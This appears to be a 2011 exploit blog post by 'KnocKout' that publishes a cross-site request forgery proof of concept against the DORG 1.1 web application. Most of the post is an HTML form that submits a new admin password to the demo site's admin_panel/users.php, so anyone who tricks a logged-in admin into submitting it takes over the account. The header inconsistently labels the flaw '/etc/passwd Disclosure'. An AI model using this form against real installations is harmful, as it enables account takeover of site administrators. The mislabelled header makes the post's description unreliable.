h4x0re Security, Vulnerability Researching, Exploits, h4, KnocKout: DORG 1.1 <= CSR-Forqery PoC Exploit

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

|~Web App. : DORG1.1

|~Price : N/A

|~Version : N/A

|~Software: http://php.opensourcecms.com/scripts/details.php?scriptid=479&name=Disc%20ORGanizer%20-%20DORG

|~Vulnerability Style : /etc/passwd Disclosure

|~Vulnerability Dir : /

|~Google Keyword : N/A

|[~]Date : "06.05.2011"

|[~]Tested on : Offical Demo ; http://demo.opensourcecms.com/dorg/

----------------------------------------------------------

users.php <= SESSIONS Not Security

Admin Password Change CSRF POc .

================================================================

<form action='http://demo.opensourcecms.com/dorg/admin_panel/users.php?page=2&id=1' method="POST">

<table>

<tr>

<td>Username: </td>

<td><strong>admin</strong></td>

</tr>

<tr><td colspan='2'></td></tr>

<tr>

<td>Active?</td>

<td><strong>yes</strong></td>

</tr>

<tr><td colspan='2'><br /></td></tr>

<tr>

<td><label for="new_pw">New password:</label></td>

<td><input type="password" name="new_pw" id="new_pw" /></td>

</tr>

<tr>

<td><label for="new_pw_c">New password (confirmation):</label></td>

<td><input type="password" name="new_pw_c" id="new_pw_c" /></td>

</tr>

<tr><td colspan='2'><i>Your password will be encrypted</i></td></tr>

<tr><td colspan='2'><br /></td></tr>

<tr><td
 colspan='2'><input type='submit' name='submit' value='Update' 
/>&nbps;-&nbps;or&nbps;-&nbps;<input type='submit'
 name='submit' value='Deactivate User' /></td></tr>

</table>

</form>

Sayfalar

6 Mayıs 2011 Cuma

DORG 1.1 <= CSR-Forqery PoC Exploit

Hiç yorum yok:

Yorum Gönder

Databases News.